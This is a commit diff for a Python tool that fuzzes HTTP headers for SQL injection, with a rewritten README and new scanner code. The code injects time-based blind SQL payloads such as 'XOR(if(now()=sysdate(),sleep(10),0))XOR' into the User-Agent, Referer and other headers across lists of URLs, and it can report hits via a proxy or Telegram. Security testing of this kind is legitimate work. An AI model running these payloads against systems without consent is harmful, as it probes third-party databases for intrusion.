STRLCPY/userefuzz

userefuzz_v2.1
root-tanishq committed 1 year ago

0090d2b9

1 parent 6be0fe78

■ ■ ■ ■ ■ ■

README.md

1	1		<p align="center">
2		-	<img src="https://github.com/root-tanishq/userefuzz/blob/main/images/userefuzz_icon.png">
	2	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/userefuzz_icon.png">
3	3		</p>
4	4		<h1 align="center">
5	5
6	6		[![PYPI](https://img.shields.io/badge/PYPI-UseReFuzz-orange)](https://pypi.org/project/userefuzz/)
7	7		[![MIT](https://img.shields.io/github/license/root-tanishq/userefuzz)](https://github.com/root-tanishq/userefuzz/blob/main/LICENSE)
8		-	[![Version](https://img.shields.io/badge/Latest--Version-2.0.2-brightgreen)](#)
	8	+	[![Version](https://img.shields.io/badge/Latest--Version-2.1.0-brightgreen)](#)
9	9		[![Twitter URL](https://img.shields.io/twitter/url/https/twitter.com/root_tanishq.svg?style=social&label=Follow%20%40root_tanishq)](https://twitter.com/root_tanishq) <br />
10	10		[![Youtube](https://img.shields.io/youtube/channel/subscribers/UC0HLRnmOx3x_hsAGAdG9VaQ?style=social)](https://www.youtube.com/@boyfromfuture69)
11	11		[![Github](https://img.shields.io/github/stars/root-tanishq/userefuzz?style=social)](https://github.com/root-tanishq/userefuzz/stargazers)
		skipped 6 lines
18	18		Works on `linux`, `Windows` and `MacOS` based systems<br />
19	19		</h3>
20	20
21		-	<h2><b>Legal Disclaimer</h2></b>
	21	+	<table>
	22	+	<tr>
	23	+	<td>
22	24
	25	+	<h3 align="center">
	26	+
	27	+	### Legal Disclaimer
	28	+	</h3>
23	29		Usage of userefuzz for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
24	30		<br />
25	31
26		-	<h2><b>Installation</b></h2><br/>
	32	+
	33	+	</td>
	34	+	</tr>
	35	+	</table>
	36	+
	37	+	<h1 align="center">
27	38
28		-	- pip
	39	+	# Installation
	40	+	</h1>
	41	+
	42	+	### pip
29	43
30	44		```sh
31	45		pip install userefuzz
32	46		```
33		-	> It will be installed by the name `userefuzz.py`
34		-
35	47
36		-	- setup
	48	+	### setup
37	49
38	50		```sh
39	51		git clone https://github.com/root-tanishq/userefuzz
40	52		cd userefuzz
41	53		python3 setup.py install
42	54		```
43		-	> It will be installed by the name `userefuzz.py`
44	55
45		-	<h2><b>Usage</b></h2><br/>
	56	+	<h1 align="center">
	57	+
	58	+	# Usage
	59	+	</h1>
	60	+	<h2 align="center">
46	61
47		-	<h3><b>Parsing a list of URLs</b></h2><br/>
	62	+	## Parsing URLs
	63	+	</h2>
48	64
	65	+	### Parsing a list of URLs
49	66		```sh
50		-	userefuzz -l <URL LIST>
	67	+	$ userefuzz -l <LIST>
51	68		```
	69	+	<p align="center">
	70	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_list.png">
	71	+	</p>
52	72
53		-	![list](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_parse_list.png)<br />
54		-
55		-	<h3><b>Parsing a URL</b></h2><br/>
	73	+	### Parsing a URL
	74	+	```sh
	75	+	$ userefuzz -u <URL>
	76	+	```
	77	+	<p align="center">
	78	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_url.png">
	79	+	</p>
56	80
	81	+	### Parsing stdin URLs
57	82		```sh
58		-	userefuzz -u <URL>
	83	+	$ <STDIN LIST> \| userefuzz
59	84		```
	85	+	<p align="center">
	86	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_stdin.png">
	87	+
	88	+	> Use `-v` switch for verbose(includes non-vuln detected URLs) output
	89	+
	90	+	</p>
	91	+	<h2 align="center">
60	92
61		-	![url](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_url.png)<br />
	93	+	## Multi Processing
	94	+	</h2>
62	95
63		-	<h3><b>Parsing stdin</b></h2><br/>
	96	+	> Multi Processing will create more process and will increase the speed of the tool.
64	97
65	98		```sh
66		-	<SOME COMMANDS> \| userefuzz
	99	+	$ userefuzz <LIST / URL> -w <WORKER COUNT>
67	100		```
	101	+	<p align="center">
	102	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_workers.png">
	103	+	</p>
68	104
69		-	![stdin](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_stdin.png)<br />
	105	+	<h2 align="center">
70	106
71		-	<h3><b>Verbose Output</b></h2><br/>
	107	+	## Proxy Interception And Custom Injection
	108	+	</h2>
72	109
	110	+	### Proxy interception of vulnerable request
73	111		```sh
74		-	userefuzz <LIST / URL> -v
	112	+	$ userefuzz <LIST/URL> -p <PROXY>
75	113		```
	114	+	<p align="center">
	115	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_proxy.png">
	116	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_proxy2.png">
	117	+	</p>
76	118
77		-	![vb](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_verbose.png)<br />
78		-
79		-	<h3><b>Multi Processing</b></h2><br/>
80		-
	119	+	### Custom message in request
81	120		```sh
82		-	userefuzz <LIST / URL> -w <WORKER COUNT>
	121	+	$ userefuzz <LIST/URL> -m <MESSAGE>
83	122		```
84		-
85		-	> 1 Worker Took 23 secs
86		-
87		-	![w1](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_worker1.png)<br />
	123	+	<p align="center">
	124	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_msg.png">
	125	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_msg2.png">
	126	+	</p>
88	127
89		-	> 10 Worker Took 20 secs
90		-
91		-	![w1](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_worker10.png)<br />
92		-
93		-	<h3><b>Proxy Interception of Vulnerable Requests</b></h2><br/>
94		-
	128	+	### Custom payload with custom sleep
95	129		```sh
96		-	userefuzz <LIST / URL> -p <YOUR PROXY>
	130	+	$ userefuzz <LIST/URL> -i <CUSTOM SQLI PAYLOAD> -s <SLEEP COUNT IN THE PAYLOAD>
97	131		```
	132	+	<p align="center">
	133	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_pinject.png">
	134	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_pinject2.png">
	135	+	</p>
98	136
99		-	![proxy](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_proxy.png)<br />
100		-
101		-	<h3><b>Custom Message in request</b></h2><br/>
102		-
	137	+	### Multi payload with custom sleep
103	138		```sh
104		-	userefuzz <LIST / URL> -m <MESSAGE>
	139	+	$ userefuzz <LIST/URL> -i <SQLI PAYLOAD FILE> -s <SLEEP COUNT IN THE PAYLOAD>
105	140		```
106		-
107		-	![msg](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_message.png)<br />
108		-
109		-	<h3><b>Custom Payload with custom sleep</b></h2><br/>
	141	+	<p align="center">
	142	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_finject.png">
	143	+	</p>
110	144
	145	+	### Custom header injection
111	146		```sh
112		-	userefuzz <LIST / URL> -i <CUSTOM SQLI PAYLOAD> -s <SLEEP COUNT IN THE PAYLOAD>
	147	+	$ userefuzz <LIST/URL> -ch <CUSTOM HEADER NAME>
113	148		```
114		-
115		-	![inject](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_inject.png)<br />
116		-
117		-	<h3><b>Custom Header Injection</b></h2><br/>
	149	+	<p align="center">
	150	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_finject2.png">
	151	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_sch2.png">
	152	+	</p>
118	153
	154	+	### Multi header injection
	155	+	> For multiple headers use `\|` as shown below.
119	156		```sh
120		-	userefuzz <LIST / URL> -ch <CUSTOM HEADER NAME>
	157	+	$ userefuzz <LIST/URL> -ch <CUSTOM HEADER NAME\|OTHER HEADERS>
121	158		```
	159	+	<p align="center">
	160	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_mch.png">
	161	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_mch2.png">
	162	+	</p>
	163	+
122	164
123		-	![ch](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_header.png)<br />
	165	+	<h2 align="center">
124	166
125		-	<h3><b>Output</b></h2><br/>
	167	+	## Output
	168	+	</h2>
126	169
	170	+	### Markdown output
127	171		```sh
128		-	userefuzz <LIST / URL> -o <OUTPUT FILE NAME WITHOUT EXT>
	172	+	$ userefuzz <LIST/URL> -o <OUTPUT FILE NAME WITHOUT EXT>
129	173		```
	174	+	<p align="center">
	175	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_output.png">
	176	+	</p>
130	177
131		-	![o1](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_out1.png)<br />
132	178
133		-	> Output File
134	179
135		-	![o1](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_out2.png)<br />
	180	+	### Output file content
	181	+	<p align="center">
	182	+	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/u_2.1_out_md.png">
	183	+	</p>
	184	+	<table>
	185	+	<tr>
	186	+	<td>
	187	+	<h2 align="center">
136	188
137		-	<h3><b>Telegram Notifications of Vulnerable Requests with Telify</b></h2><br/>
	189	+	## Telify Notifications
	190	+	</h2>
138	191
139		-	> The Tool uses [Telify](https://github.com/root-tanishq/telify) configuration file for sending notification .So inorder to use this feature you need to setup telify
	192	+	> The Tool uses [Telify](https://github.com/root-tanishq/telify) configuration file for sending notification .So inorder to use this feature you need to setup telify.
140	193
141	194		```sh
142		-	userefuzz <LIST / URL> -t
	195	+	$ userefuzz <LIST / URL> -t
143	196		```
144	197
145		-	![t](https://github.com/root-tanishq/userefuzz/blob/main/images/urf2_telify.png)<br />
	198	+	</td>
	199	+	</tr>
	200	+	</table>
146	201

■ ■ ■ ■ ■ ■

pypi.md

1	-	<p align="center">
2	-	<img src="https://raw.githubusercontent.com/root-tanishq/userefuzz/main/images/userefuzz_icon.png">
3	-	</p>
4	-	<h1 align="center">
5	-	<b>UseReFuzz</b>
6	-	</h1>
7	-
8	-	> User-Agent , X-Forwareded-For , Referer and other http headers SQLI Fuzzer
9	-
10	-	- [USAGE of UseReFuzz](https://github.com/root-tanishq/userefuzz)
11	-

■ ■ ■ ■ ■ ■

setup.py

1	1		from setuptools import setup
2	2
3	3		def readme():
4		-	with open('pypi.md') as f:
	4	+	with open('README.md') as f:
5	5		return f.read()
6	6
7	7		setup(
8	8		name='userefuzz',
9		-	version='2.0.2',
	9	+	version='2.1.0',
10	10		long_description=readme(),
11	11		long_description_content_type="text/markdown",
12	12		description='User-Agent and Referer Header SQLI Fuzzer',
		skipped 1 lines
14	14		author='Tanishq Rathore',
15	15		license='MIT',
16	16		packages=['userefuzz'],
17		-	scripts=['userefuzz/userefuzz.py'],
18		-	install_requires=['requests'],
19		-
	17	+	install_requires=['requests','colorama'],
20	18		classifiers=[
21	19		'Programming Language :: Python :: 3',
22	20		],
	21	+	entry_points={
	22	+	'console_scripts': [
	23	+	'userefuzz = userefuzz.__main__:main'
	24	+	]
	25	+	},
23	26		)
24	27

■ ■ ■ ■ ■ ■

userefuzz/__init__.py

1	+	# UseReFuzz Modules for Python
2	+	# No Documentations will be provided as the modules are only created for UseReFuzz tool only
3	+	# Author = Tanishq Rathore
4	+	# Version = 2.1.0
5	+	import colorama
6	+	import requests
7	+	import urllib3
8	+	import os
9	+
10	+
11	+	def header_injector(url,custom_header,injection_payload,userefuzz_message,http_proxy,output,telify_APITOKEN,telify_CHATID,is_telify,verbose,sleep_time):
12	+	# For Colouring in Windows and other OS
13	+	colorama.init()
14	+	# Use the following name if you dont want to run the following part of the function
15	+	# custom_header = 'NO_CUSTOM_HEADER'
16	+	# http_proxy = 'NO_PROXY'
17	+	# output = 'NO_OUTPUT'
18	+	# Colour Codes
19	+	HEADER = '\033[95m'
20	+	OKBLUE = '\033[94m'
21	+	OKCYAN = '\033[96m'
22	+	OKGREEN = '\033[92m'
23	+	WARNING = '\033[93m'
24	+	FAIL = '\033[91m'
25	+	ENDC = '\033[0m'
26	+	BOLD = '\033[1m'
27	+	UNDERLINE = '\033[4m'
28	+	SLANT = '\x1B[3m'
29	+
30	+	# Disable SSL Warnings
31	+	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
32	+
33	+	# X-Auth\|Bearer\|X-Forward-For
34	+	if custom_header != 'NO_CUSTOM_HEADER':
35	+	headlist = custom_header.split('\|')
36	+	header = {}
37	+	for head in headlist:
38	+	header[head] = injection_payload
39	+
40	+	header['UseReFuzz'] = userefuzz_message
41	+	else:
42	+	header = {'User-Agent':injection_payload , 'Referer': injection_payload , 'X-Forwarded-For': injection_payload , 'UseReFuzz': userefuzz_message}
43	+
44	+	proxy = {'http' : http_proxy , 'https': http_proxy}
45	+	sess = requests.Session()
46	+	resp = sess.get(url, headers=header , verify=False)
47	+	resp_time = resp.elapsed.total_seconds()
48	+	try:
49	+	if resp_time >= sleep_time-1:
50	+	if http_proxy != 'NO_PROXY':
51	+	try:
52	+	sess.get(url , headers=header , verify=False , proxies=proxy , timeout=0.000000000001)
53	+	except:
54	+	pass
55	+	print(f'{OKGREEN}{BOLD}[💉P{ENDC}{OKGREEN}{BOLD}] \t[ {ENDC}{str(resp_time)[:4]}{BOLD}{OKGREEN} ] URL => {ENDC}', url)
56	+	print(f'{OKGREEN}{BOLD}[💉P{ENDC}{OKGREEN}{BOLD}] \t[ {ENDC}{str(resp_time)[:4]}{BOLD}{OKGREEN} ] (↑) PAYLOAD => {ENDC}', injection_payload)
57	+	else:
58	+	print(f'{OKGREEN}{BOLD}[💉💉{ENDC}{OKGREEN}{BOLD}] \t[ {ENDC}{str(resp_time)[:4]}{BOLD}{OKGREEN} ] URL => {ENDC}', url)
59	+	print(f'{OKGREEN}{BOLD}[💉💉{ENDC}{OKGREEN}{BOLD}] \t[ {ENDC}{str(resp_time)[:4]}{BOLD}{OKGREEN} ] (↑) PAYLOAD => {ENDC}', injection_payload)
60	+
61	+	if output != 'NO_OUTPUT':
62	+	fileappend = open(output + ".md" , "a")
63	+	fileappend.write(f'\| {resp_time} \| "{url}" \| 💉True \| "{injection_payload}"\n')
64	+	fileappend.flush()
65	+	fileappend.close()
66	+
67	+	if is_telify == 'TELIFY_UP':
68	+	telifyurl = f'https://api.telegram.org/bot{telify_APITOKEN}/sendMessage'
69	+	requests.post(telifyurl, json={'chat_id': telify_CHATID, 'text': f'[💎] (USEREFUZZ)⛓️URL(💻)⛓️ {url} ⛓️RESPONSE TIME(⏲️)⛓️ {resp_time} ⛓️PAYLOAD(🔫)⛓️ {injection_payload}'})
70	+
71	+	else:
72	+	if verbose:
73	+	print(f'{FAIL}{BOLD}[{ENDC}NV{ENDC}{FAIL}{BOLD}] \t[ {ENDC}{str(resp_time)[:4]}{BOLD}{FAIL} ] URL => {ENDC}', url)
74	+	print(f'{FAIL}{BOLD}[{ENDC}NV{ENDC}{FAIL}{BOLD}] \t[ {ENDC}{str(resp_time)[:4]}{BOLD}{FAIL} ] (↑) PAYLOAD => {ENDC}', injection_payload)
75	+
76	+	if output != 'NO_OUTPUT':
77	+	fileappend = open(output + ".md" , "a")
78	+	fileappend.write(f'\| {resp_time} \| "{url}" \| False \| "{injection_payload}"\n')
79	+	fileappend.flush()
80	+	fileappend.close()
81	+	except:
82	+	if verbose:
83	+	print(f'{FAIL}{BOLD}[{ENDC}ER{ENDC}{FAIL}{BOLD}] \t[ {ENDC}{str(resp_time)[:4]}{BOLD}{FAIL} ] URL => {ENDC}', url)
84	+	print(f'{FAIL}{BOLD}[{ENDC}ER{ENDC}{FAIL}{BOLD}] \t[ {ENDC}{str(resp_time)[:4]}{BOLD}{FAIL} ] (↑) PAYLOAD => {ENDC}', injection_payload)
85	+
86	+	if output != 'NO_OUTPUT':
87	+	fileappend = open(output + ".md" , "a")
88	+	fileappend.write(f'\| {resp_time} \| "{url}" \| ERROR \| "{injection_payload}"\n')
89	+	fileappend.flush()
90	+	fileappend.close()
91	+
92	+	def multi_payload(url_mp,custom_header_mp,injection_payload_mp,userefuzz_message_mp,http_proxy_mp,output_mp,telify_APITOKEN_mp,telify_CHATID_mp,is_telify_mp,verbose_mp,sleep_time_mp):
93	+	if os.path.exists(injection_payload_mp):
94	+	payload_file_mp = open(injection_payload_mp, 'r')
95	+	for payload_file_mp_lines in payload_file_mp.readlines():
96	+	inject_end = payload_file_mp_lines.replace('\n','')
97	+	header_injector(url_mp,custom_header_mp,inject_end,userefuzz_message_mp,http_proxy_mp,output_mp,telify_APITOKEN_mp,telify_CHATID_mp,is_telify_mp,verbose_mp,sleep_time_mp)
98	+	else:
99	+	inject_end = injection_payload_mp
100	+	header_injector(url_mp,custom_header_mp,inject_end,userefuzz_message_mp,http_proxy_mp,output_mp,telify_APITOKEN_mp,telify_CHATID_mp,is_telify_mp,verbose_mp,sleep_time_mp)
101	+

■ ■ ■ ■ ■ ■

userefuzz/__main__.py

1	+	#!/usr/bin/env python3
2	+	try:
3	+	from __init__ import header_injector , multi_payload
4	+	except:
5	+	from userefuzz import header_injector , multi_payload
6	+
7	+	import colorama
8	+	import argparse
9	+	import os
10	+	import datetime
11	+	import configparser
12	+	import multiprocessing as mp
13	+	import sys
14	+	from functools import partial
15	+
16	+	# For Colouring on Windows based OS
17	+	colorama.init()
18	+
19	+	VERSION = '2.1.0'
20	+	class bcolors:
21	+	HEADER = '\033[95m'
22	+	OKBLUE = '\033[94m'
23	+	OKCYAN = '\033[96m'
24	+	OKGREEN = '\033[92m'
25	+	WARNING = '\033[93m'
26	+	FAIL = '\033[91m'
27	+	ENDC = '\033[0m'
28	+	BOLD = '\033[1m'
29	+	UNDERLINE = '\033[4m'
30	+	SLANT = '\x1B[3m'
31	+
32	+	# Banner
33	+	banner=f"""
34	+	{bcolors.FAIL} ( (
35	+	{bcolors.WARNING} )\ {bcolors.FAIL}) ){bcolors.WARNING}\ )
36	+	( ({bcolors.FAIL} (()/( ( ({bcolors.WARNING}(){bcolors.FAIL}/( {bcolors.WARNING}(
37	+	)\ ( ){bcolors.FAIL})\ /(_))){bcolors.WARNING})\ /(_)){bcolors.FAIL}))\ ({bcolors.WARNING} (
38	+	_ ((_))\ /{bcolors.FAIL}((_\|_)) /{bcolors.WARNING}((_\|_{bcolors.FAIL}))_/((_{bcolors.WARNING}))\ )\ {bcolors.OKBLUE}
39	+	\| \| \| ((_\|_)) \| _ (_)) \| \|_(_))(((_\|(_)
40	+	\| \|_\| (_-< -_)\| / -_)\| __\| \|\| \|_ /_ /
41	+	\___//__\|___\|\|_\|_\___\|\|_\| \_,_/__/__\| {bcolors.SLANT}{bcolors.UNDERLINE}V {VERSION}{bcolors.ENDC} {bcolors.SLANT}{bcolors.UNDERLINE}@github.com/root-tanishq{bcolors.ENDC}
42	+
43	+	{bcolors.OKBLUE}
44	+	[ 💉💉💉 {bcolors.ENDC}{bcolors.BOLD} Basic Header SQLI Injection Tester{bcolors.OKBLUE} 💉💉💉 ]{bcolors.ENDC}
45	+	"""
46	+
47	+	print(banner)
48	+
49	+	# Arguments
50	+	parser = argparse.ArgumentParser()
51	+	parser.add_argument('-l','--list', type=str,help=f'📄_List of URL to check for Header SQL Injection \t \t {bcolors.BOLD} {bcolors.OKBLUE}-l urllist.txt{bcolors.ENDC}',default="NO_LIST")
52	+	parser.add_argument('-p','--proxy', type=str,help=f'✈️ _Burp proxy or any other proxy to send the request \t \t{bcolors.BOLD} {bcolors.OKBLUE} -p http://127.1:8080{bcolors.ENDC}',default="NO_PROXY")
53	+	parser.add_argument('-m','--message', type=str,help=f'✉️ _Send a message in header for ease of search in Burp history \t \t{bcolors.BOLD} {bcolors.OKBLUE} -m "Just Testing SQLI"{bcolors.ENDC}',default="Testing for SQLI in User-Agent and Referer Header")
54	+	parser.add_argument('-s','--sleep', type=int,help=f'😴_How much sleep is used in your custom payload \t \t{bcolors.BOLD} {bcolors.OKBLUE} -s 12 {bcolors.ENDC} Default Sleep = 10' , default=10)
55	+	parser.add_argument('-v','--verbose', help=f'💣_Display All URLs and output \t \t{bcolors.BOLD} {bcolors.OKBLUE} -v {bcolors.ENDC}', action='store_true' , default=False)
56	+	parser.add_argument('-t','--telify', help=f'💬_Notify on telegram (https://github.com/root-tanishq/telify configuration file required) \t \t{bcolors.BOLD} {bcolors.OKBLUE} -t {bcolors.ENDC}', action='store_true' , default=False)
57	+	parser.add_argument('-o','--output', type=str,help=f'📁_Save the vulnerable URLs to an output file \t \t{bcolors.BOLD} {bcolors.OKBLUE} -o savefile {bcolors.ENDC}', default="NO_OUTPUT")
58	+	parser.add_argument('-u','--url', type=str,help=f'🤖_Pass a URL to check for Header SQLI Injections \t \t{bcolors.BOLD} {bcolors.OKBLUE} -u http://domain.tld/index.php {bcolors.ENDC}', default='NO_URL')
59	+	parser.add_argument('-ch','--customheader', type=str,help=f'🔒_Custom Header for SQLI Injections (For Multiple Header seperate them with \| )\t \t{bcolors.BOLD} {bcolors.OKBLUE} FOR ONE HEADER: -ch X-Auth FOR MULTIPLE HEADER: -ch "X-Auth\|X-Test\|Bearer\|Custom_HEAD" {bcolors.ENDC}', default="NO_CUSTOM_HEADER")
60	+	parser.add_argument('-w','--workers', type=int,help=f'👷_No. of workers (Processes) at a time \t \t{bcolors.BOLD} {bcolors.OKBLUE}-w 10 {bcolors.ENDC}\t \t Default Workers = 5',default=5)
61	+	parser.add_argument('-i','--inject', type=str,help=f"""💉_Send your custom payload Or a file of payloads for SQL Injection \t \t{bcolors.BOLD} {bcolors.OKBLUE} -i "'+sleep(10)+'" -i sqli_payloads.txt{bcolors.ENDC} """ , default='"XOR(if(now()=sysdate(),sleep(10),0))XOR"')
62	+	args = parser.parse_args()
63	+
64	+	# Telify
65	+	CHAT_ID = ''
66	+	API_TOKEN = ''
67	+	is_telify_main = 'TELIFY_DOWN'
68	+	if args.telify:
69	+	try:
70	+	config = configparser.ConfigParser()
71	+	config.read(os.path.join(os.path.expanduser( '~' ),'telify.ini'))
72	+	CHAT_ID = config['TELIFY']['CHATID']
73	+	API_TOKEN = config['TELIFY']['APITOKEN']
74	+	telifyurl = f'https://api.telegram.org/bot{API_TOKEN}/sendMessage'
75	+	requests.post(telifyurl, json={'chat_id': CHAT_ID, 'text': f'[💡] (USEREFUZZ) Runned on (⏲️) {datetime.datetime.now()} ⏬'})
76	+	is_telify_main = 'TELIFY_UP'
77	+	except:
78	+	print(f"😺{bcolors.WARNING}_No Configuration found , setup telify now => {bcolors.ENDC}{bcolors.BOLD} https://github.com/root-tanishq/telify {bcolors.ENDC}")
79	+
80	+	if args.customheader != 'NO_CUSTOM_HEADER':
81	+	print(f'{bcolors.BOLD}{bcolors.OKGREEN}[{bcolors.ENDC}##{bcolors.BOLD}{bcolors.OKGREEN}]{bcolors.ENDC}',' Headers which UseReFuzz using for injection',bcolors.BOLD,bcolors.OKBLUE, args.customheader.replace('\|',', '),bcolors.ENDC)
82	+	print()
83	+	else:
84	+	print(f'{bcolors.BOLD}{bcolors.OKGREEN}[{bcolors.ENDC}##{bcolors.BOLD}{bcolors.OKGREEN}]{bcolors.ENDC}',' Headers which UseReFuzz using for injection',bcolors.BOLD,bcolors.OKBLUE,'User-Agent, X-Forwarded-For, Referer',bcolors.ENDC)
85	+	print()
86	+
87	+	if args.output != "NO_OUTPUT":
88	+	print(f'{bcolors.BOLD} 📂 Logging Output of UseReFuzz to => {args.output}.md \n')
89	+	file = open(args.output + ".md","w")
90	+	# Custom Header
91	+	if args.customheader != 'NO_CUSTOM_HEADER':
92	+	output_ch = args.customheader.replace('\|',', ')
93	+	else:
94	+	output_ch = 'User-Agent, X-Forwarded-For, Referer'
95	+	file.write(f"""
96	+	# UseReFuzz HEADER SQLI INJECTION REPORT
97	+
98	+	## Author - Tanishq Rathore (Kun)
99	+	## Github - https://github.com/root-tanishq/userefuzz
100	+	## Twitter - https://twitter.com/root_tanishq
101	+
102	+	> UseReFuzz runned on `{datetime.datetime.now()}`
103	+
104	+	## Legality
105	+
106	+	```
107	+	Usage of userefuzz for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
108	+	```
109	+
110	+	- Headers `{output_ch}`
111	+
112	+	- Sleep used for checking `{args.sleep}`
113	+
114	+	# Report Results
115	+	\| TIME TAKEN \| URL \| IS VULNERABLE \| PAYLOAD \|
116	+	\| --- \| --- \| --- \| --- \|
117	+	""")
118	+	file.close()
119	+
120	+	def main():
121	+	if args.url != "NO_URL":
122	+	multi_payload(args.url,args.customheader,args.inject,args.message,args.proxy,args.output,API_TOKEN,CHAT_ID,is_telify_main,args.verbose,args.sleep)
123	+	elif args.list != "NO_LIST":
124	+	try:
125	+	urllist = filter(None , open(args.list,'r').read().split("\n"))
126	+	with mp.Pool(args.workers) as worker:
127	+	multi_fuzz = partial(multi_payload, custom_header_mp=args.customheader,injection_payload_mp=args.inject,userefuzz_message_mp=args.message,http_proxy_mp=args.proxy,output_mp=args.output,telify_APITOKEN_mp=API_TOKEN,telify_CHATID_mp=CHAT_ID,is_telify_mp=is_telify_main,verbose_mp=args.verbose,sleep_time_mp=args.sleep)
128	+	worker.map(multi_fuzz , urllist)
129	+	except KeyboardInterrupt:
130	+	exit(0)
131	+	except:
132	+	if os.path.isfile(args.list):
133	+	exit(0)
134	+	else:
135	+	print(f'😥{bcolors.BOLD}{bcolors.FAIL}_We are unable to read the file or the file does not exist{bcolors.ENDC}')
136	+	elif not sys.stdin.isatty():
137	+	try:
138	+	urlfile = []
139	+	for line in sys.stdin:
140	+	try:
141	+	urlfile.append(line.split()[0])
142	+	except:
143	+	pass
144	+	with mp.Pool(args.workers) as worker:
145	+	multi_fuzz = partial(multi_payload, custom_header_mp=args.customheader,injection_payload_mp=args.inject,userefuzz_message_mp=args.message,http_proxy_mp=args.proxy,output_mp=args.output,telify_APITOKEN_mp=API_TOKEN,telify_CHATID_mp=CHAT_ID,is_telify_mp=is_telify_main,verbose_mp=args.verbose,sleep_time_mp=args.sleep)
146	+	worker.map(multi_fuzz , urlfile)
147	+	except KeyboardInterrupt:
148	+	exit(0)
149	+	except:
150	+	exit(0)
151	+	else:
152	+	print(f"😺{bcolors.WARNING}_No Option Provided please check {bcolors.ENDC}{bcolors.BOLD}# userefuzz --help {bcolors.ENDC}")
153	+
154	+	if __name__ == '__main__':
155	+	main()

■ ■ ■ ■ ■ ■

userefuzz/userefuzz.py

1	-	#!/usr/bin/env python3
2	-	# Author = Tanishq Rathore (Kun)
3	-	# V = 2.0.0
4	-
5	-	import requests
6	-	import argparse
7	-	import urllib3
8	-	import multiprocessing as mp
9	-	import sys
10	-	import os
11	-	import datetime
12	-	import configparser
13	-
14	-	# Disable warning regarding ssl
15	-	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
16	-
17	-	# Colour Checking
18	-	if os.name != 'nt':
19	-	class bcolors:
20	-	HEADER = '\033[95m'
21	-	OKBLUE = '\033[94m'
22	-	OKCYAN = '\033[96m'
23	-	OKGREEN = '\033[92m'
24	-	WARNING = '\033[93m'
25	-	FAIL = '\033[91m'
26	-	ENDC = '\033[0m'
27	-	BOLD = '\033[1m'
28	-	UNDERLINE = '\033[4m'
29	-	SLANT = '\x1B[3m'
30	-	else:
31	-	class bcolors:
32	-	HEADER = ''
33	-	OKBLUE = ''
34	-	OKCYAN = ''
35	-	OKGREEN = ''
36	-	WARNING = ''
37	-	FAIL = ''
38	-	ENDC = ''
39	-	BOLD = ''
40	-	UNDERLINE = ''
41	-	SLANT = ''
42	-	print("USEREFUZZ \| Colouring is disable as Windows OS is detected")
43	-
44	-
45	-	# Banner
46	-	banner=f"""
47	-	{bcolors.FAIL} ( (
48	-	{bcolors.WARNING} )\ {bcolors.FAIL}) ){bcolors.WARNING}\ )
49	-	( ({bcolors.FAIL} (()/( ( ({bcolors.WARNING}(){bcolors.FAIL}/( {bcolors.WARNING}(
50	-	)\ ( ){bcolors.FAIL})\ /(_))){bcolors.WARNING})\ /(_)){bcolors.FAIL}))\ ({bcolors.WARNING} (
51	-	_ ((_))\ /{bcolors.FAIL}((_\|_)) /{bcolors.WARNING}((_\|_{bcolors.FAIL}))_/((_{bcolors.WARNING}))\ )\ {bcolors.OKBLUE}
52	-	\| \| \| ((_\|_)) \| _ (_)) \| \|_(_))(((_\|(_)
53	-	\| \|_\| (_-< -_)\| / -_)\| __\| \|\| \|_ /_ /
54	-	\___//__\|___\|\|_\|_\___\|\|_\| \_,_/__/__\| {bcolors.SLANT}{bcolors.UNDERLINE}V 2.0.0{bcolors.ENDC}
55	-
56	-	{bcolors.OKBLUE}
57	-	[ 💉💉💉 {bcolors.ENDC}{bcolors.BOLD} Basic Header SQLI Injection Tester{bcolors.OKBLUE} 💉💉💉 ]{bcolors.ENDC}
58	-	"""
59	-
60	-	print(banner)
61	-
62	-	# Arguments
63	-	parser = argparse.ArgumentParser()
64	-	parser.add_argument('-l','--list', type=str,help=f'📄_List of URL to check for Header SQL Injection \t \t {bcolors.BOLD} {bcolors.OKBLUE}-l urllist.txt{bcolors.ENDC}',default="NO_LIST")
